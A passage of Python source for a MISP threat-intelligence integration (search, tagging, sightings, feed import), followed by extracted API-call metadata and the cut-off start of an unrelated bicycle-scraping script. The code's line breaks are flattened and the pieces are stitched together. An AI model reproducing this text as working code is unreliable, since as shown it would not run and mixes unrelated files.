event_name (str): Name of the event """ related_events = [] object_tags_list = object_data_dict.get('Tag', []) for tag in object_tags_list: if tag.get('ID') == found_tag: event_id = get_event_id(object_data_dict) tag_name = tag.get('Name') related_events.append({'Event_ID': event_id, 'Event_Name': event_name, 'Tag_Name': tag_name, 'Tag_ID': tag.get('ID')}) return related_events def get_event_id(data_dict): if data_dict.get('EventID'): return data_dict.get('EventID') elif data_dict.get('ID'): return data_dict.get('ID') return data_dict.get('Event', {}).get('ID') def get_dbot_indicator(dbot_type, dbot_score, value): if dbot_type == "FILE": hash_type = get_hash_type(value) if hash_type == 'md5': return Common.File(dbot_score=dbot_score, md5=value) if hash_type == 'sha1': return Common.File(dbot_score=dbot_score, sha1=value) if hash_type == 'sha256': return Common.File(dbot_score=dbot_score, sha256=value) if dbot_type == "IP": return Common.IP(ip=value, dbot_score=dbot_score) if dbot_type == "DOMAIN": return Common.Domain(domain=value, dbot_score=dbot_score) if dbot_type == "EMAIL": return Common.EMAIL(address=value, dbot_score=dbot_score) if dbot_type == "URL": return Common.URL(url=value, dbot_score=dbot_score) def build_misp_complex_filter(demisto_query: str): """ Examples are available in UT: test_build_misp_complex_filter. For more information please see build_complex_query in pymisp/api.py Args: demisto_query: complex query contains saved words: 'AND:', 'OR:' and 'NOT:' using ',' as delimiter for parameters and ';' as delimiter for operators. using the operators is optional. if 'demisto_query' does not contains any of the complex operators the original input will be returned Returns: str: dictionary created for misp to perform complex query or if no complex query found returns the original input """ regex_and = r'(AND:)([^\;]+)(;)?' regex_or = r'(OR:)([^\;]+)(;)?' regex_not = r'(NOT:)([^\;]+)(;)?' 
misp_query_params = dict() match_and = re.search(regex_and, demisto_query, re.MULTILINE) match_or = re.search(regex_or, demisto_query, re.MULTILINE) match_not = re.search(regex_not, demisto_query, re.MULTILINE) is_complex_and_operator = is_misp_complex_search_helper(match_and, misp_query_params, 'and_parameters') is_complex_or_operator = is_misp_complex_search_helper(match_or, misp_query_params, 'or_parameters') is_complex_not_operator = is_misp_complex_search_helper(match_not, misp_query_params, 'not_parameters') is_complex_search = is_complex_and_operator or is_complex_or_operator or is_complex_not_operator if is_complex_search: return PYMISP.build_complex_query(**misp_query_params) return demisto_query def is_misp_complex_search_helper(match_operator, misp_query_params, operator_key): is_complex_search = False if match_operator is not None: misp_query_params[operator_key] = match_operator.group(2).split(',') is_complex_search = True return is_complex_search def prepare_args_to_search(controller): demisto_args = demisto.args() args_to_misp_format = {arg: demisto_args[arg] for arg in MISP_SEARCH_ARGUMENTS if arg in demisto_args} # Replacing keys and values from Demisto to Misp's keys if 'type' in args_to_misp_format: args_to_misp_format['type_attribute'] = args_to_misp_format.pop('type') if 'to_ids' in args_to_misp_format: args_to_misp_format['to_ids'] = 1 if demisto_args.get('to_ids') == 'true' else 0 if 'from' in args_to_misp_format: args_to_misp_format['date_from'] = args_to_misp_format.pop('from') if 'to' in args_to_misp_format: args_to_misp_format['date_to'] = args_to_misp_format.pop('to') if 'event_id' in args_to_misp_format: args_to_misp_format['eventid'] = argToList(args_to_misp_format.pop('event_id')) if 'last' in args_to_misp_format: args_to_misp_format['publish_timestamp'] = args_to_misp_format.pop('last') if 'include_decay_score' in args_to_misp_format: args_to_misp_format['include_decay_score'] = 1 if demisto_args.get('include_decay_score') == 'true' else 0 if 'include_sightings' in args_to_misp_format: args_to_misp_format['include_sightings'] = 1 if demisto_args.get('include_sightings') == 'true' else 0 if 'include_correlations' in args_to_misp_format: args_to_misp_format['include_correlations'] = 1 if demisto_args.get('include_correlations') == 'true' else 0 if 'enforceWarninglist' in args_to_misp_format: args_to_misp_format['enforceWarninglist'] = 1 if demisto_args.get('enforceWarninglist') == 'true' else 0 if 'include_feed_correlations' in args_to_misp_format: args_to_misp_format['includeFeedCorrelations'] = 1 if demisto_args.get( 'include_feed_correlations') == 'true' else 0 args_to_misp_format.pop('include_feed_correlations') if 'limit' not in args_to_misp_format: args_to_misp_format['limit'] = '50' if 'tags' in args_to_misp_format: args_to_misp_format['tags'] = build_misp_complex_filter(args_to_misp_format['tags']) args_to_misp_format['controller'] = controller demisto.debug(f"[MISP V3]: args for {demisto.command()} command are {args_to_misp_format}") return args_to_misp_format def build_attributes_search_response(response: Union[dict, requests.Response], include_correlations=False) -> dict: """ Convert the response of attribute search returned from MISP to the context output format. 
""" response_object = copy.deepcopy(response) if include_correlations: # return full related attributes only if the user wants to get them back ATTRIBUTE_FIELDS.append('RelatedAttribute') if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) attributes = response_object.get('Attribute') return get_limit_attribute_search_outputs(attributes) def get_limit_attribute_search_outputs(attributes): for i in range(len(attributes)): attributes[i] = {key: attributes[i].get(key) for key in ATTRIBUTE_FIELDS if key in attributes[i]} build_galaxy_output(attributes[i]) build_tag_output(attributes[i]) build_sighting_output_from_attribute_search_response(attributes[i]) convert_timestamp_to_readable(attributes[i], None) formatted_attributes = replace_keys_from_misp_to_context_data(attributes) return formatted_attributes def build_galaxy_output(given_object): """given_object is attribute or event, depends on the called function""" if given_object.get('Galaxy'): given_object['Galaxy'] = [ { 'name': star.get('name'), 'type': star.get('type'), 'description': star.get('description') } for star in given_object['Galaxy'] ] def build_object_output(event): if event.get('Object'): event['Object'] = [ { 'name': event_object.get('name'), 'uuid': event_object.get('uuid'), 'description': event_object.get('description'), 'id': event_object.get('id') } for event_object in event['Object'] ] def build_tag_output(given_object): """given_object is attribute or event, depends on the called function""" if given_object.get('Tag'): given_object['Tag'] = [ {'Name': tag.get('name'), 'is_galaxy': tag.get('is_galaxy') } for tag in given_object.get('Tag') ] def build_sighting_output_from_attribute_search_response(attribute): if attribute.get('Sighting'): attribute['Sighting'] = [ {'type': sighting.get('type') } for sighting in attribute.get('Sighting') ] def build_attributes_search_response_return_only_values(response_object: Union[dict, requests.Response]) -> list: """returns list of attributes' values that match the search query when user set the arg 'compact' to True""" if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) attributes = response_object.get('Attribute') return [attribute.get('value') for attribute in attributes] def pagination_args_validation(page, limit): if page and page < 0: raise DemistoException("page should be zero or a positive number") if limit and limit < 0: raise DemistoException("limit should be zero or a positive number") def attribute_response_to_markdown_table(response: dict): attribute_highlights = [] for attribute in response: event = attribute.get('Event', {}) attribute_tags = [tag.get('Name') for tag in attribute.get('Tag')] if attribute.get( 'Tag') else None attribute_sightings = [SIGHTING_TYPE_ID_TO_NAME[sighting.get('Type')] for sighting in attribute.get('Sighting')] if attribute.get('Sighting') else None attribute_highlights.append({ 'Attribute ID': attribute.get('ID'), 'Event ID': attribute.get('EventID'), 'Attribute Category': attribute.get('Category'), 'Attribute Type': attribute.get('Type'), 'Attribute Comment': attribute.get('Comment'), 'Attribute Value': attribute.get('Value'), 'Attribute Tags': attribute_tags, 'Attribute Sightings': attribute_sightings, 'To IDs': attribute.get('ToIDs'), 'Timestamp': attribute.get('Timestamp'), 'Event Info': event.get('Info'), 'Event Organization ID': event.get('OrganizationID'), 'Event Distribution': event.get('Distribution'), 'Event UUID': event.get('UUID') }) return 
attribute_highlights def search_attributes(demisto_args: dict) -> CommandResults: """Execute a MISP search over 'attributes'""" args = prepare_args_to_search('attributes') outputs_should_include_only_values = argToBoolean(demisto_args.get('compact', False)) include_correlations = argToBoolean(demisto_args.get('include_correlations', False)) page = arg_to_number(demisto_args.get('page', 1), "page", required=True) limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True) pagination_args_validation(page, limit) response = PYMISP.search(**args) if response: if outputs_should_include_only_values: response_for_context = build_attributes_search_response_return_only_values(response) number_of_results = len(response_for_context) md = tableToMarkdown(f"MISP search-attributes returned {number_of_results} attributes", response_for_context[:number_of_results], ["Value"]) else: response_for_context = build_attributes_search_response(response, include_correlations) attribute_highlights = attribute_response_to_markdown_table(response_for_context) pagination_message = f"Current page size: {limit}\n" if len(response_for_context) == limit: pagination_message += f"Showing page {page} out others that may exist" else: pagination_message += f"Showing page {page}" md = tableToMarkdown( f"MISP search-attributes returned {len(response_for_context)} attributes\n {pagination_message}", attribute_highlights, removeNull=True) return CommandResults( raw_response=response, readable_output=md, outputs=response_for_context, outputs_prefix="MISP.Attribute", outputs_key_field="ID" ) else: return CommandResults(readable_output=f"No attributes found in MISP for the given filters: {args}") def build_events_search_response(response: Union[dict, requests.Response]) -> dict: """ Convert the response of event search returned from MISP to the context output format. please note: attributes are excluded from search-events output as the information is too big. User can use the command search-attributes in order to get the information about the attributes. 
""" response_object = copy.deepcopy(response) if isinstance(response_object, str): response_object = json.loads(json.dumps(response_object)) events = [event.get('Event') for event in response_object] for i in range(0, len(events)): # Filter object from keys in event_args events[i] = {key: events[i].get(key) for key in EVENT_FIELDS if key in events[i]} events[i]['RelatedEvent'] = [] # there is no need in returning related event when searching for an event build_galaxy_output(events[i]) build_tag_output(events[i]) build_object_output(events[i]) events[i]['timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('timestamp')) events[i]['publish_timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('publish_timestamp')) formatted_events = replace_keys_from_misp_to_context_data(events) # type: ignore return formatted_events # type: ignore def event_to_human_readable_tag_list(event): event_tags = event.get('Tag', []) if event_tags: return [tag.get('Name') for tag in event_tags] def event_to_human_readable_galaxy_list(event): event_galaxies = event.get('Galaxy', []) if event_galaxies: return [galaxy.get('Name') for galaxy in event.get('Galaxy')] def event_to_human_readable_object_list(event): event_objects = event.get('Object', []) if event_objects: return [event_object.get('ID') for event_object in event.get('Object')] def event_to_human_readable(response: dict): event_highlights = [] for event in response: event_tags = event_to_human_readable_tag_list(event) event_galaxies = event_to_human_readable_galaxy_list(event) event_objects = event_to_human_readable_object_list(event) event_highlights.append({ 'Event ID': event.get('ID'), 'Event Tags': event_tags, 'Event Galaxies': event_galaxies, 'Event Objects': event_objects, 'Publish Timestamp': event.get('PublishTimestamp'), 'Event Info': event.get('Info'), 'Event Org ID': event.get('OrganizationID'), 'Event Orgc ID': event.get('OwnerOrganization.ID'), 'Event Distribution': event.get('Distribution'), 'Event UUID': event.get('UUID'), }) return event_highlights def search_events(demisto_args: dict) -> CommandResults: """ Execute a MISP search using the 'event' controller. """ args = prepare_args_to_search('events') page = arg_to_number(demisto_args.get('page', 1), "page", required=True) limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True) pagination_args_validation(page, limit) response = PYMISP.search(**args) if response: response_for_context = build_events_search_response(response) event_outputs_to_human_readable = event_to_human_readable(response_for_context) pagination_message = f"Current page size: {limit}\n" if len(response_for_context) == limit: pagination_message += f"Showing page {page} out others that may exist" else: pagination_message += f"Showing page {page}" md = tableToMarkdown( f"MISP search-events returned {len(response_for_context)} events.\n {pagination_message}", event_outputs_to_human_readable, removeNull=True) return CommandResults( raw_response=response, readable_output=md, outputs=response_for_context, outputs_prefix="MISP.Event", outputs_key_field="ID" ) else: return CommandResults(readable_output=f"No events found in MISP for the given filters: {args}") def delete_event(demisto_args: dict): """ Gets an event id and deletes it. 
""" event_id = demisto_args.get('event_id') response = PYMISP.delete_event(event_id) if 'errors' in response: raise DemistoException(f'Event ID: {event_id} has not found in MISP: \nError message: {response}') else: human_readable = f'Event {event_id} has been deleted' return CommandResults(readable_output=human_readable, raw_response=response) def add_tag(demisto_args: dict, is_attribute=False): """ Function will add tag to given UUID of event or attribute. is_attribute (bool): if the given UUID belongs to an attribute (True) or event (False). """ uuid = demisto_args.get('uuid') tag = demisto_args.get('tag') try: PYMISP.tag(uuid, tag) # add the tag except PyMISPError: raise DemistoException("Adding the required tag was failed. Please make sure the UUID exists.") if is_attribute: response = PYMISP.search(uuid=uuid, controller='attributes') human_readable = f'Tag {tag} has been successfully added to attribute {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(response), raw_response=response ) # event's uuid response = PYMISP.search(uuid=uuid) human_readable = f'Tag {tag} has been successfully added to event {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(response), raw_response=response ) def remove_tag(demisto_args: dict, is_attribute=False): """ Function will remove tag to given UUID of event or attribute. is_attribute (bool): if the given UUID is an attribute's one. Otherwise it's event's. """ uuid = demisto_args.get('uuid') tag = demisto_args.get('tag') try: response = PYMISP.untag(uuid, tag) if response and response.get('errors'): raise DemistoException(f'Error in `{demisto.command()}` command: {response}') except PyMISPError: raise DemistoException("Removing the required tag was failed. 
Please make sure the UUID and tag exist.") if is_attribute: response = PYMISP.search(uuid=uuid, controller='attributes') human_readable = f'Tag {tag} has been successfully removed from the attribute {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=build_attributes_search_response(response), raw_response=response ) # event's uuid response = PYMISP.search(uuid=uuid) human_readable = f'Tag {tag} has been successfully removed from the event {uuid}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=build_events_search_response(response), raw_response=response ) def add_sighting(demisto_args: dict): """Adds sighting to MISP attribute """ attribute_id = demisto_args.get('id') attribute_uuid = demisto_args.get('uuid') sighting_type = demisto_args['type'] # mandatory arg att_id = attribute_id or attribute_uuid if not att_id: raise DemistoException('ID or UUID not specified') sighting_args = { 'id': attribute_id, 'uuid': attribute_uuid, 'type': SIGHTING_TYPE_NAME_TO_ID[sighting_type] } sigh_obj = MISPSighting() sigh_obj.from_dict(**sighting_args) response = PYMISP.add_sighting(sigh_obj, att_id) if response.get('message'): raise DemistoException(f"An error was occurred: {response.get('message')}") elif response.get('Sighting'): human_readable = f'Sighting \'{sighting_type}\' has been successfully added to attribute {att_id}' return CommandResults(readable_output=human_readable) raise DemistoException(f"An error was occurred: {json.dumps(response)}") def test(malicious_tag_ids, suspicious_tag_ids, attributes_limit): """ Test module. """ is_tag_list_valid(malicious_tag_ids) is_tag_list_valid(suspicious_tag_ids) if attributes_limit < 0: raise DemistoException('Attribute limit has to be a positive number.') response = PYMISP._prepare_request('GET', 'servers/getPyMISPVersion.json') if PYMISP._check_json_response(response): return 'ok' else: raise DemistoException('MISP has not connected.') def build_feed_url(demisto_args): url = demisto_args.get('feed') url = url[:-1] if url.endswith('/') else url if PREDEFINED_FEEDS.get(url): url = PREDEFINED_FEEDS[url].get('url') # type: ignore return url def add_events_from_feed(demisto_args: dict, use_ssl: bool, proxies: dict): """Gets an OSINT feed from url and publishing them to MISP urls with feeds for example: https://www.misp-project.org/feeds/ feed format must be MISP. 
""" headers = {'Accept': 'application/json'} url = build_feed_url(demisto_args) osint_url = f'{url}/manifest.json' limit = arg_to_number(demisto_args.get('limit', 2), "limit", required=True) try: uri_list = requests.get(osint_url, verify=use_ssl, headers=headers, proxies=proxies).json() events_ids = list() # type: List[Dict[str, int]] for index, uri in enumerate(uri_list, 1): response = requests.get(f'{url}/{uri}.json', verify=use_ssl, headers=headers, proxies=proxies).json() misp_new_event = MISPEvent() misp_new_event.load(response) add_event_response = PYMISP.add_event(misp_new_event) event_object = add_event_response.get('Event') if event_object and 'id' in event_object: events_ids.append({'ID': event_object['id']}) if limit == len(events_ids): break human_readable = tableToMarkdown(f'Total of {len(events_ids)} events was added to MISP.', events_ids) return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=events_ids, ) except ValueError as e: raise DemistoException(f'URL [{url}] is not a valid MISP feed. error: {e}') def add_object(event_id: str, obj: MISPObject): """Sending object to MISP and returning outputs Args: obj: object to add to MISP event_id: ID of event """ response = PYMISP.add_object(event_id, misp_object=obj) if 'errors' in response: raise DemistoException(f'Error in `{demisto.command()}` command: {response}') for ref in obj.ObjectReference: response = PYMISP.add_object_reference(ref) for attribute in response.get('Object', {}).get('Attribute', []): convert_timestamp_to_readable(attribute, None) response['Object']['timestamp'] = misp_convert_timestamp_to_date_string(response.get('Object', {}).get('timestamp')) formatted_response = replace_keys_from_misp_to_context_data(response) formatted_response.update({"ID": event_id}) human_readable = f'Object has been added to MISP event ID {event_id}' return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Event', outputs_key_field='ID', outputs=formatted_response, ) def add_file_object(demisto_args: dict): entry_id = demisto_args.get('entry_id') event_id = demisto_args.get('event_id') file_path = demisto.getFilePath(entry_id).get('path') obj = FileObject(file_path) return add_object(event_id, obj) def add_domain_object(demisto_args: dict): """Adds a domain object to MISP domain-ip description: https://www.misp-project.org/objects.html#_domain_ip """ text = demisto_args.get('text') event_id = demisto_args.get('event_id') domain = demisto_args.get('name') obj = MISPObject('domain-ip') ips = argToList(demisto_args.get('ip')) for ip in ips: obj.add_attribute('ip', value=ip) obj.add_attribute('domain', value=domain) if text: obj.add_attribute('text', value=text) return add_object(event_id, obj) def add_url_object(demisto_args: dict): """Building url object in MISP scheme Scheme described https://www.misp-project.org/objects.html#_url """ url_args = [ 'text', 'last_seen', 'first_seen' ] event_id = demisto_args.get('event_id') url = demisto_args.get('url') url_parse = urlparse(url) url_obj = [{'url': url}] url_obj.extend({'scheme': url_parse.scheme}) if url_parse.scheme else None url_obj.append({'resource_path': url_parse.path}) if url_parse.path else None url_obj.append({'query_string': url_parse.query}) if url_parse.query else None url_obj.append({'domain': url_parse.netloc}) if url_parse.netloc else None url_obj.append({'fragment': url_parse.fragment}) if url_parse.fragment else None url_obj.append({'port': url_parse.port}) if url_parse.port else None 
url_obj.append( {'credential': (url_parse.username, url_parse.password)}) if url_parse.username and url_parse.password else None url_obj.extend(convert_arg_to_misp_args(demisto_args, url_args)) g_object = build_generic_object('url', url_obj) return add_object(event_id, g_object) def add_generic_object_command(demisto_args: dict): event_id = demisto_args.get('event_id') template = demisto_args.get('template') attributes = demisto_args.get('attributes').replace("'", '"') try: args = json.loads(attributes) if not isinstance(args, list): args = dict_to_generic_object_format(args) obj = build_generic_object(template, args) return add_object(event_id, obj) except ValueError as e: raise DemistoException( f'`attribute` parameter could not be decoded, may not be valid JSON\nattribute: {attributes}', str(e)) def convert_arg_to_misp_args(demisto_args, args_names): return [{arg.replace('_', '-'): demisto_args.get(arg)} for arg in args_names if demisto_args.get(arg)] def add_ip_object(demisto_args: dict): event_id = demisto_args.get('event_id') ip_object_args = [ 'dst_port', 'src_port', 'domain', 'hostname', 'ip_src', 'ip_dst' ] # converting args to MISP's argument types misp_attributes_args = convert_arg_to_misp_args(demisto_args, ip_object_args) ips = argToList(demisto_args.get('ip')) for ip in ips: misp_attributes_args.append({'ip': ip}) if misp_attributes_args: non_req_args = [ 'first_seen', 'last_seen', ] misp_attributes_args.extend(convert_arg_to_misp_args(demisto_args, non_req_args)) misp_attributes_args.append({'text': demisto_args.get('comment')}) if demisto_args.get('comment') else None obj = build_generic_object('ip-port', misp_attributes_args) return add_object(event_id, obj) else: raise DemistoException( f'None of the required arguments is present. Command {demisto.command()} requires one of {ip_object_args}') def handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids): """ Gets 2 sets which include tag ids. If there is an id that exists in both sets, it will be removed from the suspicious tag ids set and will stay only in the malicious one (as a tag that was configured to be malicious is stronger than one recognised as suspicious).
""" common_ids = set(malicious_tag_ids) & set(suspicious_tag_ids) suspicious_tag_ids = {tag_id for tag_id in suspicious_tag_ids if tag_id not in common_ids} return malicious_tag_ids, suspicious_tag_ids def is_tag_list_valid(tag_ids): """Gets a list ot tag ids (each one is str), and verify all the tags are valid positive integers.""" for tag in tag_ids: try: tag = int(tag) if tag <= 0: raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.") except ValueError: raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.") def create_updated_attribute_instance(demisto_args: dict, attribute_uuid: str) -> MISPAttribute: attribute_type = demisto_args.get('type') distribution = demisto_args.get('distribution') category = demisto_args.get('category') comment = demisto_args.get('comment') value = demisto_args.get('value') first_seen = demisto_args.get('first_seen') last_seen = demisto_args.get('last_seen') attribute_instance = MISPAttribute() attribute_instance.uuid = attribute_uuid if attribute_type: attribute_instance.type = attribute_type if distribution: attribute_instance.distribution = MISP_DISTRIBUTION_TO_IDS[distribution] if category: attribute_instance.category = category if value: attribute_instance.value = value if comment: attribute_instance.comment = comment if first_seen: attribute_instance.first_seen = first_seen if last_seen: attribute_instance.last_seen = last_seen return attribute_instance def update_attribute_command(demisto_args: dict) -> CommandResults: attribute_uuid = demisto_args.get('attribute_uuid') attribute_instance = create_updated_attribute_instance(demisto_args, attribute_uuid) attribute_instance_response = PYMISP.update_attribute(attribute=attribute_instance, attribute_id=attribute_uuid) if isinstance(attribute_instance_response, dict) and attribute_instance_response.get('errors'): raise DemistoException(attribute_instance_response.get('errors')) human_readable = f"## MISP update attribute\nAttribute: {attribute_uuid} was updated.\n" attribute = attribute_instance_response.get('Attribute') convert_timestamp_to_readable(attribute, None) parsed_attribute_data = replace_keys_from_misp_to_context_data(attribute) return CommandResults( readable_output=human_readable, outputs_prefix='MISP.Attribute', outputs_key_field='ID', outputs=parsed_attribute_data, ) def main(): params = demisto.params() malicious_tag_ids = argToList(params.get('malicious_tag_ids')) suspicious_tag_ids = argToList(params.get('suspicious_tag_ids')) reliability = params.get('integrationReliability', 'B - Usually reliable') if DBotScoreReliability.is_valid_type(reliability): reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability) else: Exception("MISP V3 error: Please provide a valid value for the Source Reliability parameter") attributes_limit = arg_to_number(params.get('attributes_limit', 20), "attributes_limit", required=True) command = demisto.command() demisto.debug(f'[MISP V3]: command is {command}') args = demisto.args() try: malicious_tag_ids, suspicious_tag_ids = handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids) if command == 'test-module': return_results(test(malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids, attributes_limit=attributes_limit)) elif command == 'misp-create-event': return_results(create_event_command(args)) elif command == 'misp-add-attribute': return_results(add_attribute(demisto_args=args)) elif command == 'misp-search-events': 
return_results(search_events(args)) elif command == 'misp-search-attributes': return_results(search_attributes(args)) elif command == 'misp-delete-event': return_results(delete_event(args)) elif command == 'misp-add-sighting': return_results(add_sighting(args)) elif command == 'misp-add-tag-to-event': return_results(add_tag(args)) elif command == 'misp-add-tag-to-attribute': return_results(add_tag(demisto_args=args, is_attribute=True)) elif command == 'misp-remove-tag-from-event': return_results(remove_tag(args)) elif command == 'misp-remove-tag-from-attribute': return_results(remove_tag(demisto_args=args, is_attribute=True)) elif command == 'misp-add-events-from-feed': return_results(add_events_from_feed(demisto_args=args, use_ssl=VERIFY, proxies=PROXIES)) elif command == 'file': return_results( generic_reputation_command(args, 'file', 'FILE', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'url': return_results( generic_reputation_command(args, 'url', 'URL', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'ip': return_results( generic_reputation_command(args, 'ip', 'IP', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'domain': return_results( generic_reputation_command(args, 'domain', 'DOMAIN', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'email': return_results(generic_reputation_command(args, 'email', 'EMAIL', malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit)) elif command == 'misp-add-file-object': return_results(add_file_object(args)) elif command == 'misp-add-domain-object': return_results(add_domain_object(args)) elif command == 'misp-add-url-object': return_results(add_url_object(args)) elif command == 'misp-add-ip-object': return_results(add_ip_object(args)) elif command == 'misp-add-object': return_results(add_generic_object_command(args)) elif command == 'misp-update-attribute': return_results(update_attribute_command(args)) except PyMISPError as e: return_error(e.message) except Exception as e: return_error(str(e)) if __name__ in ['__main__', '__builtin__', 'builtins']: main()
[((37, 0, 37, 26), 'urllib3.disable_warnings', 'urllib3.disable_warnings', ({}, {}), '()', False, 'import urllib3\n'), ((50, 13, 50, 88), 'pymisp.ExpandedPyMISP', 'ExpandedPyMISP', (), '', False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((294, 18, 294, 55), 'pymisp.tools.GenericObjectGenerator', 'GenericObjectGenerator', ({(294, 41, 294, 54): 'template_name'}, {}), '(template_name)', False, 'from pymisp.tools import GenericObjectGenerator\n'), ((396, 15, 396, 43), 'copy.deepcopy', 'copy.deepcopy', ({(396, 29, 396, 42): 'misp_response'}, {}), '(misp_response)', False, 'import copy\n'), ((494, 12, 494, 23), 'pymisp.MISPEvent', 'MISPEvent', ({}, {}), '()', False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((820, 22, 820, 45), 'copy.deepcopy', 'copy.deepcopy', ({(820, 36, 820, 44): 'response'}, {}), '(response)', False, 'import copy\n'), ((972, 22, 972, 45), 'copy.deepcopy', 'copy.deepcopy', ({(972, 36, 972, 44): 'response'}, {}), '(response)', False, 'import copy\n'), ((1160, 15, 1160, 29), 'pymisp.MISPSighting', 'MISPSighting', ({}, {}), '()', False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((1258, 10, 1258, 31), 'pymisp.tools.FileObject', 'FileObject', ({(1258, 21, 1258, 30): 'file_path'}, {}), '(file_path)', False, 'from pymisp.tools import FileObject\n'), ((1269, 10, 1269, 33), 'pymisp.MISPObject', 'MISPObject', ({(1269, 21, 1269, 32): '"""domain-ip"""'}, {}), "('domain-ip')", False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((1290, 16, 1290, 29), 'urllib.parse.urlparse', 'urlparse', ({(1290, 25, 1290, 28): 'url'}, {}), '(url)', False, 'from urllib.parse import urlparse\n'), ((1385, 25, 1385, 40), 'pymisp.MISPAttribute', 'MISPAttribute', ({}, {}), '()', False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n'), ((1208, 29, 1208, 40), 'pymisp.MISPEvent', 'MISPEvent', ({}, {}), '()', False, 'from pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\n')]
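For illustration of the tag handling in the MISP integration above: handle_tag_duplication_ids keeps an id that appears in both groups only on the malicious side. A minimal, self-contained sketch of that rule (hypothetical helper name, plain Python sets, no PyMISP required):

# Sketch only -- restates the de-duplication rule from handle_tag_duplication_ids above.
def dedupe_tag_ids(malicious_tag_ids, suspicious_tag_ids):
    malicious = set(malicious_tag_ids)
    suspicious = set(suspicious_tag_ids) - malicious  # ids in both groups stay malicious only
    return malicious, suspicious

print(dedupe_tag_ids({'1', '2'}, {'2', '3'}))  # ({'1', '2'}, {'3'})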
fusuyfusuy/School-Projects
pycle/bicycle-scrapes/epey-scrape/downLink5.py
8e38f19da90f63ac9c9ec91e550fc5aaab3d0234
from bs4 import BeautifulSoup import os import wget from urllib.request import Request, urlopen bicycles=[{'name': 'Kron XC150 27.5 HD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc150-27-5-hd.html'}, {'name': 'Corelli Trivor 3 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-trivor-3-0.html'}, {'name': 'Salcano Hector 26 V Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-hector-26-v.html'}, {'name': 'Corelli Atrox 3.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-atrox-3-2.html'}, {'name': 'Mosso WildFire LTD HYD 27.5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/mosso-wildfire-hyd-27-5.html'}, {'name': 'Corelli Via 1.2 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-via-1-2.html'}, {'name': 'Kron FD 1000 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-fd-1000.html'}, {'name': 'Bisan CTS 5200 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bisan-cts-5200.html'}, {'name': 'Kron XC100 26 MD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-xc100-26-md.html'}, {'name': 'Bisan SPX-3250 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bisan-spx-3250.html'}, {'name': 'Kron RC1000 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-rc1000.html'}, {'name': 'Carraro E-Viva Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-e-viva.html'}, {'name': 'Kron Ares 4.0 26 MD Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-ares-4-0-26-md.html'}, {'name': 'Carraro Monster 16 Bisiklet', 'link': 'https://www.epey.com/bisiklet/carraro-monster-16.html'}, {'name': 'Salcano Helen 26 Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-helen-26.html'}, {'name': 'Bianchi RCX 527 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-rcx-527-27-5.html'}, {'name': 'RKS TNT5 Bisiklet', 'link': 'https://www.epey.com/bisiklet/rks-tnt5.html'}, {'name': 'Corelli Via Lady 1.1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-via-lady-1-1.html'}, {'name': 'Corelli Snoop 3.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-snoop-3-0.html'}, {'name': 'Corelli Dolce 2.0 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-dolce-2-0.html'}, {'name': 'Corelli Neon 2.1 Bisiklet', 'link': 'https://www.epey.com/bisiklet/corelli-neon-2-1.html'}, {'name': 'Kron CX100 Bisiklet', 'link': 'https://www.epey.com/bisiklet/kron-cx100-man.html'}, {'name': 'Bianchi Aspid 27 Bisiklet', 'link': 'https://www.epey.com/bisiklet/bianchi-aspid-27.html'}, {'name': 'Salcano İzmir Bisiklet', 'link': 'https://www.epey.com/bisiklet/salcano-izmir.html'}, {'name': 'Ümit 